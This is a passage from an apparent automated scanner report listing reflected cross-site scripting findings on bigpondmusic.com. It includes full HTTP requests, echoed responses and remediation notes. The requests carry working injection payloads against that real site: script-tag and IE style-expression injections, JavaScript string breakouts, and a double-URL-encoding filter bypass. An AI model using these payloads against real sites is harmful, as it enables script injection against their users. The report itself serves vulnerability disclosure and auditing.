Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 229873


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Albums $13 and Under - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/bargains/under13?874f6"style="x:expression(alert(1))"4e4f0e24928=1" />
...[SNIP]...

2.177. http://bigpondmusic.com/bargains/under13/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /bargains/under13/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ce9c2'%3bab1ce357a08 was submitted in the REST URL parameter 1. This input was echoed as ce9c2';ab1ce357a08 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bargainsce9c2'%3bab1ce357a08/under13/ HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 02:48:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87802


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
bpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'bargainsce9c2';ab1ce357a08';
   s.prop4 = 'under13';
   
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4;
   s.prop11
...[SNIP]...

2.178. http://bigpondmusic.com/bargains/under13/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /bargains/under13/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 107c8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e43f02f38efd was submitted in the REST URL parameter 1. This input was echoed as 107c8"><script>alert(1)</script>43f02f38efd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /bargains107c8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e43f02f38efd/under13/ HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 02:48:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87834


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/bargains107c8"><script>alert(1)</script>43f02f38efd/under13/" />
...[SNIP]...

2.179. http://bigpondmusic.com/bargains/under13/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /bargains/under13/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 38b64'%3b7b1bcc8a715 was submitted in the REST URL parameter 2. This input was echoed as 38b64';7b1bcc8a715 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bargains/under1338b64'%3b7b1bcc8a715/ HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 02:49:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88037


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
sting.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'bargains';
   s.prop4 = 'under1338b64';7b1bcc8a715';
   
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4;
   s.prop11 = 'Non-Registered-Musi
...[SNIP]...

2.180. http://bigpondmusic.com/bargains/under13/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /bargains/under13/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1ade%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e44d7c5038c9 was submitted in the REST URL parameter 2. This input was echoed as b1ade"><script>alert(1)</script>44d7c5038c9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /bargains/under13b1ade%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e44d7c5038c9/ HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 02:49:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87904


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/bargains/under13b1ade"><script>alert(1)</script>44d7c5038c9/" />
...[SNIP]...

2.181. http://bigpondmusic.com/bargains/under13/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /bargains/under13/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b12d9"style%3d"x%3aexpression(alert(1))"52b563ab311 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b12d9"style="x:expression(alert(1))"52b563ab311 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /bargains/under13/?b12d9"style%3d"x%3aexpression(alert(1))"52b563ab311=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 02:48:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 229841


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Albums $13 and Under - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/bargains/under13/?b12d9"style="x:expression(alert(1))"52b563ab311=1" />
...[SNIP]...

2.182. http://bigpondmusic.com/bargains/under13/ [ref parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /bargains/under13/

Issue detail

The value of the ref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29a14"style%3d"x%3aexpression(alert(1))"fe980943757 was submitted in the ref parameter. This input was echoed as 29a14"style="x:expression(alert(1))"fe980943757 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /bargains/under13/?ref=Net-Head-Music-Bargains29a14"style%3d"x%3aexpression(alert(1))"fe980943757 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:12:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 229900


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Albums $13 and Under - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/bargains/under13/?ref=Net-Head-Music-Bargains29a14"style="x:expression(alert(1))"fe980943757" />
...[SNIP]...

2.183. http://bigpondmusic.com/bargains/under5 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /bargains/under5

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8cf67%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2659a2ed60e was submitted in the REST URL parameter 1. This input was echoed as 8cf67"><script>alert(1)</script>2659a2ed60e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /bargains8cf67%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2659a2ed60e/under5 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:15:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87831


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/bargains8cf67"><script>alert(1)</script>2659a2ed60e/under5" />
...[SNIP]...

2.184. http://bigpondmusic.com/bargains/under5 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /bargains/under5

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 444ae'%3b14886af3365 was submitted in the REST URL parameter 1. This input was echoed as 444ae';14886af3365 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bargains444ae'%3b14886af3365/under5 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:15:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87901


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
bpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'bargains444ae';14886af3365';
   s.prop4 = 'under5';
   
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4;
   s.prop11
...[SNIP]...

2.185. http://bigpondmusic.com/bargains/under5 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /bargains/under5

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 625b9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e473a7d2f336 was submitted in the REST URL parameter 2. This input was echoed as 625b9"><script>alert(1)</script>473a7d2f336 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /bargains/under5625b9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e473a7d2f336 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:16:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88122


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/bargains/under5625b9"><script>alert(1)</script>473a7d2f336" />
...[SNIP]...

2.186. http://bigpondmusic.com/bargains/under5 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /bargains/under5

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ae4bb'%3b381fbba2e70 was submitted in the REST URL parameter 2. This input was echoed as ae4bb';381fbba2e70 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bargains/under5ae4bb'%3b381fbba2e70 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:16:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87901


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
esting.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'bargains';
   s.prop4 = 'under5ae4bb';381fbba2e70';
   
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4;
   s.prop11 = 'Non-Registered-Musi
...[SNIP]...

2.187. http://bigpondmusic.com/bargains/under5 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /bargains/under5

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86e23"style%3d"x%3aexpression(alert(1))"359e420ded3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 86e23"style="x:expression(alert(1))"359e420ded3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /bargains/under5?86e23"style%3d"x%3aexpression(alert(1))"359e420ded3=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:15:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 195591


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Bargain Ep's - BigPond Music
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/bargains/under5?86e23"style="x:expression(alert(1))"359e420ded3=1" />
...[SNIP]...

2.188. http://bigpondmusic.com/bigpondrecommends [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /bigpondrecommends

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2cdfa%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eec42ffa9a0e was submitted in the REST URL parameter 1. This input was echoed as 2cdfa"><script>alert(1)</script>ec42ffa9a0e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /bigpondrecommends2cdfa%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eec42ffa9a0e HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:29:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87807


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/bigpondrecommends2cdfa"><script>alert(1)</script>ec42ffa9a0e" />
...[SNIP]...

2.189. http://bigpondmusic.com/bigpondrecommends [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /bigpondrecommends

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 52be7'%3b8ce78a5cd85 was submitted in the REST URL parameter 1. This input was echoed as 52be7';8ce78a5cd85 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bigpondrecommends52be7'%3b8ce78a5cd85 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
